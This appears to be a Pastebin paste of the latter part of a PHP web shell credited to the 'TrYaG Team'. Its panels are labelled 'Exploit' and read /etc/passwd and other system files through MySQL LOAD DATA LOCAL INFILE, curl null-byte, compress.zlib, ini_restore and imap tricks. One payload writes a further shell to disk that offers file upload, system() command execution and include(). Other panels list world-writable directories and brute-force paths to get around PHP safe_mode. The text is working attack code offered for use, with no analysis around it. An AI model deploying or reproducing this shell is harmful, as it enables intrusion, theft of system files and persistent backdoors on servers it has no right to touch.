  804. function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){
  805. $css = ($css == 'input') ? " class=\"input\"" : "";
  806. $input = "<select name=plugin><option>cat /etc/passwd</option></select>";
  807. return $input;
  808. }
  809. function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){
  810. $css = ($css == 'input') ? " class=\"input\"" : "";
  811. $input = "<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>";
  812. return $input;
  813. }
  814. function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
  815. $textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
  816. return $textarea;
  817. }
  818.  
  819. function formfooter($over='',$height=''){
  820. $height = empty($height) ? "" : " height=\"".$height."\"";
  821. echo " <tr class=\"secondalt\">\n";
  822. echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value='mohajer'></td>\n";
  823. echo " </tr>\n";
  824. echo " </form>\n";
  825. echo $end = empty($over) ? "" : "</table>\n";
  826. }
  827.  
  828. function makeselect($arg = array()){
  829. if ($arg[multiple]==1) {
  830. $multiple = " multiple";
  831. if ($arg[size]>0) {
  832. $size = "size=$arg[size]";
  833. }
  834. }
  835. if ($arg[css]==0) {
  836. $css = "class=\"input\"";
  837. }
  838. $select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
  839. if (is_array($arg[option])) {
  840. foreach ($arg[option] AS $key=>$value) {
  841. if (!is_array($arg[selected])) {
  842. if ($arg[selected]==$key) {
  843. $select .= "<option value=\"$key\" selected>$value</option>\n";
  844. } else {
  845. $select .= "<option value=\"$key\">$value</option>\n";
  846. }
  847.  
  848. } elseif (is_array($arg[selected])) {
  849. if ($arg[selected][$key]==1) {
  850. $select .= "<option value=\"$key\" selected>$value</option>\n";
  851. } else {
  852. $select .= "<option value=\"$key\">$value</option>\n";
  853. }
  854. }
  855. }
  856. }
  857. $select .= "</select>\n";
  858. return $select;
  859. }
  860. }
  861.  
  862.  
  863.  
  864. $tb->tableheader();
  865. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR</b></td></tr></table>','center','top');
  866. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  867.  
  868.  
  869. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file SQL:</FONT><br>' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit')));
  870. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file id:</FONT><br>' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit')));
  871. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file CURL:</FONT><br>' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit')));
  872. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file copy:</FONT><br>' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit')));
  873. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file ini_restore:</FONT><br>' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit')));
  874. $tb->headerform(array('content'=>'<FONT COLOR=RED>read file or dir with imap:</FONT><br>' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit')));
  875. $tb->headerform(array('content'=>'<FONT COLOR=RED>Make file ERORR:</FONT><br>' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit')));
  876.  
  877.  
  878. // read file SQL ( ) //
  879. if(empty($_POST['Mohajer22'])){
  880. } else {
  881. echo "read file SQL","<br>" ;
  882. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  883. $file=$_POST['Mohajer22'];
  884.  
  885.  
  886. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  887. $mysql_files = explode(':', $mysql_files_str);
  888.  
  889. $sql = array (
  890. "USE $mdb",
  891. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  892. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  893. . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
  894. . "ESCAPED BY '' "
  895. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  896.  
  897. "SELECT a FROM $tbl LIMIT 1"
  898. );
  899. mysql_connect ($mhost, $muser, $mpass);
  900.  
  901. foreach ($sql as $statement) {
  902. $q = mysql_query ($statement);
  903.  
  904. if ($q == false) die (
  905. "FAILED: " . $statement . "\n" .
  906. "REASON: " . mysql_error () . "\n"
  907. );
  908.  
  909. if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  910.  
  911. echo htmlspecialchars($r[0]);
  912. mysql_free_result ($q);
  913. }
  914. echo "</textarea>";
  915. }
  916. // ERORR //
  917. if(empty($_POST['ER'])){
  918. } else {
  919. $ERORR=$_POST['ER'];
  920. echo error_log("
  921. <html>
  922. <head>
  923. <title> Exploit: error_log() By * TrYaG Team * </title>
  924. <body bgcolor=\"#000000\">
  925. <table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
  926. <tr>
  927. <td><center><font size='6' color='#BBB516'> By TrYaG Team</font></center></td>
  928. </tr>
  929. </table>
  930. <font color='#FF0000'>
  931. </head>
  932. <?
  933. if(\$fileup == \"\"){
  934. ECHO \" reade for up \";
  935. }else{
  936. \$path= exec(\"pwd\");
  937. \$path .= \"/\$fileup_name\";
  938. \$CopyFile = copy(\$fileup,\"\$path\");
  939. if(\$CopyFile){
  940. echo \" up ok \";
  941. }else{
  942. echo \" no up \";
  943. }
  944. }
  945. if(empty(\$_POST['m'])){
  946. } else {
  947. \$m=\$_POST['m'];
  948. echo system(\$m);
  949. }
  950. if(empty(\$_POST['cmd'])){
  951. } else {
  952. \$h= \$_POST['cmd'];
  953. print include(\$h) ;
  954. }
  955. ?>
  956. <form method='POST' enctype='multipart/form-data' >
  957. <input type='file' name='fileup' size='20'>
  958. <input type='submit' value=' up '>
  959. </form>
  960. <form method='POST' >
  961. <input type='cmd' name='cmd' size='20'>
  962. <input type='submit' value=' open (shill.txt) '>
  963. </form>
  964. <form method='POST' enctype='multipart/form-data' >
  965. <input type='text' name='m' size='20'>
  966. <input type='submit' value=' run '>
  967. <input type='reset' value=' reset '>
  968. </form>
  969. ", 3,$ERORR);
  970. }
  971.  
  972. // id //
  973. if ($_POST['plugin'] ){
  974. echo "read file id" ,"<br>";
  975. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  976.  
  977.  
  978.  
  979. for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
  980. $ara = posix_getpwuid($uid);
  981. if (!empty($ara)) {
  982. while (list ($key, $val) = each($ara)){
  983. print "$val:";
  984. }
  985. print "\n";
  986. }
  987. }
  988. echo "</textarea>";
  989. break;
  990.  
  991.  
  992. }
  993.  
  994.  
  995. // CURL //
  996. if(empty($_POST['curl'])){
  997.  
  998. } else {
  999. echo "read file CURL","<br>" ;
  1000. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1001. $m=$_POST['curl'];
  1002. $ch =
  1003. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  1004. curl_exec($ch);
  1005. var_dump(curl_exec($ch));
  1006. echo "</textarea>";
  1007. }
  1008.  
  1009. // copy//
  1010. $u1p="";
  1011. $tymczas="";
  1012. if(empty($_POST['copy'])){
  1013. } else {
  1014. echo "read file copy" ,"<br>";
  1015. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1016. $u1p=$_POST['copy'];
  1017. $temp=tempnam($tymczas, "cx");
  1018. if(copy("compress.zlib://".$u1p, $temp)){
  1019. $zrodlo = fopen($temp, "r");
  1020. $tekst = fread($zrodlo, filesize($temp));
  1021. fclose($zrodlo);
  1022. echo "".htmlspecialchars($tekst)."";
  1023. unlink($temp);
  1024. echo "</textarea>";
  1025. } else {
  1026. die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  1027. <B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
  1028. access.</CENTER></FONT>");
  1029. }
  1030. }
  1031.  
  1032. /// ini_restore //
  1033. if(empty($_POST['M2'])){
  1034. } else {
  1035. echo "read file ini_restore","<br> ";
  1036. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1037. $m=$_POST['M2'];
  1038. echo ini_get("safe_mode");
  1039. echo ini_get("open_basedir");
  1040. $s=readfile("$m");
  1041. ini_restore("safe_mode");
  1042. ini_restore("open_basedir");
  1043. echo ini_get("safe_mode");
  1044. echo ini_get("open_basedir");
  1045. $s=readfile("$m");
  1046. echo "</textarea>";
  1047. }
  1048.  
  1049. // imap //
  1050.  
  1051. $string = !empty($_POST['string']) ? $_POST['string'] : 0;
  1052. $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
  1053.  
  1054. if ($string && $switch == "file") {
  1055. echo "read file imap" ,"<br>";
  1056. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1057.  
  1058. $stream = imap_open($string, "", "");
  1059.  
  1060. $str = imap_body($stream, 1);
  1061. if (!empty($str))
  1062. echo "<pre>".$str."</pre>";
  1063. imap_close($stream);
  1064. echo "</textarea>";
  1065. } elseif ($string && $switch == "dir") {
  1066. echo "read dir imap","<br>" ;
  1067. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1068.  
  1069. $stream = imap_open("/etc/passwd", "", "");
  1070. if ($stream == FALSE)
  1071. die("Can't open imap stream");
  1072. $string = explode("|",$string);
  1073. if (count($string) > 1)
  1074. $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
  1075. else
  1076. $dir_list = imap_list($stream, trim($string[0]), "*");
  1077. echo "<pre>";
  1078. for ($i = 0; $i < count($dir_list); $i++)
  1079. echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
  1080. echo "</pre>";
  1081. imap_close($stream);
  1082. echo "</textarea>";
  1083. }
  1084. $tb->tdbody ("</td></tr></table>");
  1085. // open dir //
  1086. $tb->tableheader();
  1087. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: Open dir </b></td></tr></table>','center','top');
  1088. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  1089.  
  1090. if(empty($_POST['m'])){
  1091. echo "<div><FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
  1092. <table id=tb><tr><td><FONT COLOR=\"RED\">path dir</FONT>
  1093. <INPUT type='text' name='m' size=70 value='./'>
  1094. <INPUT type='submit' value='show' id=input></td></tr></table></form></div>";
  1095.  
  1096. } else {
  1097. $m=$_POST['m'];
  1098. $spath = $m ;
  1099. $path = $m ;
  1100.  
  1101.  
  1102.  
  1103.  
  1104. $method = intval(trim($_POST['method']));
  1105.  
  1106. $handle = opendir($path);
  1107.  
  1108. $_folders = array();
  1109.  
  1110. $i = 0;
  1111.  
  1112. while (false !== ($file = readdir($handle)))
  1113. {
  1114. $full_path = "$path/$file";
  1115. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1116.  
  1117. if ((is_dir($full_path)) && ($perms == '0777'))
  1118. {
  1119. if (!file_exists('.*')) {
  1120.  
  1121. $_folders[$i] = $file;
  1122.  
  1123. $i++;
  1124. }
  1125. }
  1126. }
  1127.  
  1128.  
  1129. closedir($handle);
  1130. clearstatcache();
  1131.  
  1132.  
  1133.  
  1134. echo '<strong><FONT COLOR=#00FF00>The folders is 777 :</strong><br />';
  1135.  
  1136. foreach ($_folders as $folder)
  1137. {
  1138. echo $folder.'<br />';
  1139. }
  1140. //////////
  1141. $handle = opendir($path);
  1142.  
  1143. $_folders = array();
  1144.  
  1145. $i = 0;
  1146.  
  1147. while (false !== ($file1 = readdir($handle)))
  1148. {
  1149. $full_path = "$path/$file1";
  1150. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1151.  
  1152. if ((is_dir($full_path)) && ($perms == '0755'))
  1153. {
  1154. if (!file_exists('.*')) {
  1155.  
  1156. $_folders[$i] = $file1;
  1157.  
  1158. $i++;
  1159. }
  1160. }
  1161. }
  1162.  
  1163.  
  1164.  
  1165. clearstatcache();
  1166.  
  1167.  
  1168.  
  1169. echo '</FONT><strong><FONT COLOR=#FF9900>The folders is 755 :</strong><br />';
  1170.  
  1171. foreach ($_folders as $folder)
  1172. {
  1173. echo $folder.'<br />';
  1174. }
  1175. //////////
  1176. $handle = opendir($path);
  1177.  
  1178. $_folders = array();
  1179.  
  1180. $i = 0;
  1181.  
  1182. while (false !== ($file1 = readdir($handle)))
  1183. {
  1184. $full_path = "$path/$file1";
  1185. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1186.  
  1187. if ((is_dir($full_path)) && ($perms == '0644'))
  1188. {
  1189. if (!file_exists('.*')) {
  1190.  
  1191. $_folders[$i] = $file1;
  1192.  
  1193. $i++;
  1194. }
  1195. }
  1196. }
  1197.  
  1198.  
  1199.  
  1200. clearstatcache();
  1201.  
  1202.  
  1203.  
  1204. echo '</FONT><strong><FONT COLOR=#CC9999>The folders is 644 :</strong><br />';
  1205.  
  1206. foreach ($_folders as $folder)
  1207. {
  1208. echo $folder.'<br />';
  1209. }
  1210. //////////
  1211. $handle = opendir($path);
  1212.  
  1213. $_folders = array();
  1214.  
  1215. $i = 0;
  1216.  
  1217. while (false !== ($file1 = readdir($handle)))
  1218. {
  1219. $full_path = "$path/$file1";
  1220. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1221.  
  1222. if ((is_dir($full_path)) && ($perms == '0750'))
  1223. {
  1224. if (!file_exists('.*')) {
  1225.  
  1226. $_folders[$i] = $file1;
  1227.  
  1228. $i++;
  1229. }
  1230. }
  1231. }
  1232.  
  1233.  
  1234.  
  1235. clearstatcache();
  1236.  
  1237.  
  1238.  
  1239. echo '</FONT><strong><FONT COLOR=#9999CC>The folders is 750 :</strong><br />';
  1240.  
  1241. foreach ($_folders as $folder)
  1242. {
  1243. echo $folder.'<br />';
  1244. }
  1245. //////////
  1246. $handle = opendir($path);
  1247.  
  1248. $_folders = array();
  1249.  
  1250. $i = 0;
  1251.  
  1252. while (false !== ($file1 = readdir($handle)))
  1253. {
  1254. $full_path = "$path/$file1";
  1255. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1256.  
  1257. if ((is_dir($full_path)) && ($perms == '0604'))
  1258. {
  1259. if (!file_exists('.*')) {
  1260.  
  1261. $_folders[$i] = $file1;
  1262.  
  1263. $i++;
  1264. }
  1265. }
  1266. }
  1267.  
  1268.  
  1269.  
  1270. clearstatcache();
  1271.  
  1272.  
  1273.  
  1274. echo '</FONT><strong><FONT COLOR=#669999>The folders is 604 :</strong><br />';
  1275.  
  1276. foreach ($_folders as $folder)
  1277. {
  1278. echo $folder.'<br />';
  1279. }
  1280. //////////
  1281. $handle = opendir($path);
  1282.  
  1283. $_folders = array();
  1284.  
  1285. $i = 0;
  1286.  
  1287. while (false !== ($file1 = readdir($handle)))
  1288. {
  1289. $full_path = "$path/$file1";
  1290. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1291.  
  1292. if ((is_dir($full_path)) && ($perms == '0705'))
  1293. {
  1294. if (!file_exists('.*')) {
  1295.  
  1296. $_folders[$i] = $file1;
  1297.  
  1298. $i++;
  1299. }
  1300. }
  1301. }
  1302.  
  1303.  
  1304.  
  1305. clearstatcache();
  1306.  
  1307.  
  1308.  
  1309. echo '</FONT><strong><FONT COLOR=#336699>The folders is 705 :</strong><br />';
  1310.  
  1311. foreach ($_folders as $folder)
  1312. {
  1313. echo $folder.'<br />';
  1314. }
  1315. //////////
  1316. $handle = opendir($path);
  1317.  
  1318. $_folders = array();
  1319.  
  1320. $i = 0;
  1321.  
  1322. while (false !== ($file1 = readdir($handle)))
  1323. {
  1324. $full_path = "$path/$file1";
  1325. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1326.  
  1327. if ((is_dir($full_path)) && ($perms == '0606'))
  1328. {
  1329. if (!file_exists('.*')) {
  1330.  
  1331. $_folders[$i] = $file1;
  1332.  
  1333. $i++;
  1334. }
  1335. }
  1336. }
  1337.  
  1338.  
  1339.  
  1340. clearstatcache();
  1341.  
  1342.  
  1343.  
  1344. echo '</FONT><strong><FONT COLOR=#996666>The folders is 606 :</strong><br />';
  1345.  
  1346. foreach ($_folders as $folder)
  1347. {
  1348. echo $folder.'<br />';
  1349. }
  1350. //////////
  1351. $handle = opendir($path);
  1352.  
  1353. $_folders = array();
  1354.  
  1355. $i = 0;
  1356.  
  1357. while (false !== ($file1 = readdir($handle)))
  1358. {
  1359. $full_path = "$path/$file1";
  1360. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1361.  
  1362. if ((is_dir($full_path)) && ($perms == '0703'))
  1363. {
  1364. if (!file_exists('.*')) {
  1365.  
  1366. $_folders[$i] = $file1;
  1367.  
  1368. $i++;
  1369. }
  1370. }
  1371. }
  1372.  
  1373.  
  1374.  
  1375. clearstatcache();
  1376.  
  1377.  
  1378.  
  1379. echo '</FONT><strong><FONT COLOR=#3333FF>The folders is 703 :</strong><br />';
  1380.  
  1381. foreach ($_folders as $folder)
  1382. {
  1383. echo $folder.'<br />';
  1384. }
  1385.  
  1386.  
  1387.  
  1388. }
  1389. $handle = opendir($path);
  1390.  
  1391. $_folders = array();
  1392.  
  1393. $i = 0;
  1394.  
  1395. while (false !== ($file1 = readdir($handle)))
  1396. {
  1397. $full_path = "$path/$file1";
  1398. $perms = substr(sprintf('%o', fileperms($full_path)), -4);
  1399.  
  1400.  
  1401.  
  1402.  
  1403. $_folders[$i] = $file1;
  1404.  
  1405. $i++;
  1406.  
  1407.  
  1408. }
  1409.  
  1410.  
  1411.  
  1412. clearstatcache();
  1413.  
  1414.  
  1415.  
  1416. echo '</FONT><strong><FONT COLOR=#FFFF00>The folders and file all :</strong><br />';
  1417.  
  1418. foreach ($_folders as $folder)
  1419. {
  1420. echo $folder.'<br />';
  1421. }
  1422.  
  1423. echo '</FONT><strong><FONT COLOR=#FF0000>The total : </strong>'.$i.'</FONT><br />';
  1424. $tb->tdbody ("</td></tr></table>");
  1425.  
  1426. $tb->tableheader();
  1427. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: break fucking safe-mode </b></td></tr></table>','center','top');
  1428. $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
  1429.  
  1430.  
  1431. error_reporting(E_WARNING);
  1432. ini_set("display_errors", 1);
  1433.  
  1434. echo "<head><title>".getcwd()."</title></head>";
  1435.  
  1436. echo "<form method=POST>";
  1437. echo "<div style='float: left'><FONT COLOR=\"RED\">Root directory: </FONT><input type=text name=root value='{$_POST['root']}'></div>";
  1438. echo "<input type=submit value='--&raquo;'></form>";
  1439.  
  1440.  
  1441.  
  1442. // break fucking safe-mode !
  1443.  
  1444. $root = "/";
  1445.  
  1446. if($_POST['root']) $root = $_POST['root'];
  1447.  
  1448. if (!ini_get('safe_mode')) die("<font size=-2 face=verdana color='#CC0000'>Safe-mode is OFF.</font>");
  1449. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  1450. $c = 0; $D = array();
  1451. set_error_handler("eh");
  1452.  
  1453. $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  1454.  
  1455. for($i=0; $i < strlen($chars); $i++){
  1456. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
  1457.  
  1458. $prevD = $D[count($D)-1];
  1459. glob($path."*");
  1460.  
  1461. if($D[count($D)-1] != $prevD){
  1462.  
  1463. for($j=0; $j < strlen($chars); $j++){
  1464.  
  1465. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
  1466.  
  1467. $prevD2 = $D[count($D)-1];
  1468. glob($path."*");
  1469.  
  1470. if($D[count($D)-1] != $prevD2){
  1471.  
  1472.  
  1473. for($p=0; $p < strlen($chars); $p++){
  1474.  
  1475. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  1476.  
  1477. $prevD3 = $D[count($D)-1];
  1478. glob($path."*");
  1479.  
  1480. if($D[count($D)-1] != $prevD3){
  1481.  
  1482.  
  1483. for($r=0; $r < strlen($chars); $r++){
  1484.  
  1485. $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  1486. glob($path."*");
  1487.  
  1488. }
  1489.  
  1490. }
  1491.  
  1492. }
  1493.  
  1494. }
  1495.  
  1496. }
  1497.  
  1498. }
  1499.  
  1500. }
  1501.  
  1502. $D = array_unique($D);
  1503.  
  1504.  
  1505. foreach($D as $item) echo "{$item}\n";
  1506.  
  1507.  
  1508.  
  1509.  
  1510.  
  1511. function eh($errno, $errstr, $errfile, $errline){
  1512.  
  1513. global $D, $c, $i;
  1514. preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
  1515. if($o){ $D[$c] = $o[2]; $c++;}
  1516.  
  1517. }
  1518. echo "</textarea>";
  1519. $tb->tdbody ("</td></tr></table>");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!